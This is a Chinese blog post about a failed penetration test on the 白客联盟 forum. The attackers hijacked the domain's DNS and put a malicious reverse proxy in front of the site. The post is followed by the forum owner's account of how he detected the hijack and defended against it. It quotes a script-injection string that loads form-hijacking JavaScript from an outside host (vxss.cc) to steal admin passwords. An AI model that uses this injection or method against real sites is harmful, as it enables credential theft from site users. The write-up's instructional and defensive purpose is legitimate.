一次失败的针对白客联盟的渗透测试(域名劫持成功钓鱼失败)

Jumbo

发布于 2018-03-29 17:55:52

2.6K0

发布于 2018-03-29 17:55:52

文章被收录于专栏：中国白客联盟中国白客联盟

成功的渗透测试套路基本都是那一套。换汤不换药，不成功的原因却是千奇百怪。

我本人感觉，一次不成功的测试如果讲解细致的话反而更能提升技术水平。

这次就来讲一下针对白客联盟的渗透测试是因何失败的，具体操作方式，是通过社工手动劫持域名，然后结合反向代理添加恶意代码劫持白客联盟的登录表单(打个比方就是做一个恶意CDN)。

这次渗透是nosafe团队协同参与的，渗透前期信息踩点和域名权限获取是由P4ss完成，因为具体操作手法牵扯到域名商安全问题，以及大量站长个人信息。这里不方便做详细讲解.

但是本次渗透过程一大半的功劳都在于P4ss同志！他的努力让我获取到了域名权限。可以进行下一步的劫持操作

域名权限获取之后渗透前期工作已经做完，由我接手操作。

可以看到白客联盟是通过https访问的，并且仅限https访问，这是本次渗透测试失败的主要原因。

使用nosafe域名劫持半自动化钓鱼工具，可以直接一键搭建构造恶意反向代理。

这里我按照我们的系统提示进行了操作将他的www域名cname解析至我们的fuck.hackgo.top。

我们这里看一下替换关键字符的方式

针对discuz(其实任何网站都可以这样)

我们设置目标关键字为

</body>替换后的字符为<script src=http://vxss.cc/wC0j9v></script></body>

这样做的目的是为了把我们的表单劫持js通过恶意反向代理插入到他的网页去

本来当我准备坐等管理员登录后台收密码的时候。。缺发现域名dns被改回去了

也就是说我丢失了域名权限..

..按照成功的套路来讲，站长根本发现不了网站有误差呀。。到底哪里出了问题呢

为了给大家最官方的答复。。在这里也感谢白客联盟站长jumbo后期给了我授权，并且他本人把当时他所遇到的情况总结了出来，好让大家总结失败原因。学习

----------------------以下为Jumbo站长的原文------------------------------------------

说说我咋发现我论坛被劫持的....

17号突然发现我论坛（https://www.chinabaiker.com）绿色证书变红色了，我擦，这一看就是被劫持或者mitm了啊，赶紧超级ping下我域名，我擦，ip变45上了，但是我没管，因为我论坛还能访问（实际上是我懒），又因为是我司网速问题。

17号晚回到家，发现我的https绿色证书还是红色，论坛链接全变我的服务器ip了，还是不管，我还是以为是我宿舍网速问题。。。

18号，发现还是红色，再次超级ping下，发现ip还是45，不是我的，然后我上服务器，把我服务器重启了下，发现我论坛无法访问了，说明是域名是在我这服务器上的啊。

但是我前几天看到@F4ther_法釜基友劫持安全脉搏的文章，我觉得肯定有问题，上idc代理商，发现dns正常，就没管，到了下午，我就跑到真正的域名商那里登录下，发现dns被改成ffdns的了，我擦，这个dns不就是@F4ther_法釜基友劫持安全脉搏用的dns，这里已经确定我https证书变红色，ip变了是被劫持了，不是我公司、宿舍网速问题了。。

而且我访问那个45ip，发现他的站跟我一样，一看就是把我站仿了过来，然后想跟安全脉搏一样，想劫持我后台密码。。

我这里做了个安全保护措施，就是我登录后台时直接用ip登录，或者是本地host绑定，这样对方如果在劫持的情况下也无法劫持到我的后台密码并为了以防万一我修改了后台密码。

然后我赶紧百度查了下，一开始看错了，以为是加速乐的，

登录我的账号，发现我的域名还在我的原先加速乐账号上，说明不是劫持到加速乐上了，而且我的域名chinabaiker.com还在我原先加速乐账号上，（这里要说下，比如某个账号把某个域名放到某个dns商自己名下了，就算dns没改成你现在的，你也没法解析，但是如果对方也是想用你现在的dns商，是没法添加他的域名的，因为他的域名被你添加到了你的账号，）于是又去百度搜了下，才发现是牛盾，